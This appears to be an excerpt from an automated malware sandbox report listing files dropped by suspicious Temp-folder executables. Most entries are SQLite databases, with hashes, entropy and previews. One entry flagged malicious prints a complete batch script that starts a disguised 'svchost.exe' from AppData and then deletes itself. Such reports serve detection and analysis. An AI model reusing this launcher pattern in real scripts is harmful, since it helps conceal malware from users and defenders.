                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe
                                                                                                                                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):151
                                                                                                                                                                                                                                Entropy (8bit):5.01924739101347
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:mKDDCMNqTtvL5ot+kiEaKC5ZACSmqRDt+kiE2J5xAInTRI4q1ZPy:hWKqTtT6wknaZ5Omq1wkn23fTZq1k
                                                                                                                                                                                                                                MD5:B4C8F1EBE31C25A84E2DABEC862A2FA8
                                                                                                                                                                                                                                SHA1:B3EE64A0542DE25522BDE9797006C49E9D2A682D
                                                                                                                                                                                                                                SHA-256:DA256D7F054FC9E1DB2E7F6388C0947121C7F188D76B643BAE5C5AB5BB8AC5CE
                                                                                                                                                                                                                                SHA-512:2279A3A9B8D3F594DB31EB431ADB1F91F7A8A1A0EA6B0159175D189E131B23EB75339E94290B172C80EE1C6DF9F80AAA71654A73DF5801D4AF3FD8989B0B05B4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp7CD3.tmp.bat" /f /q..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
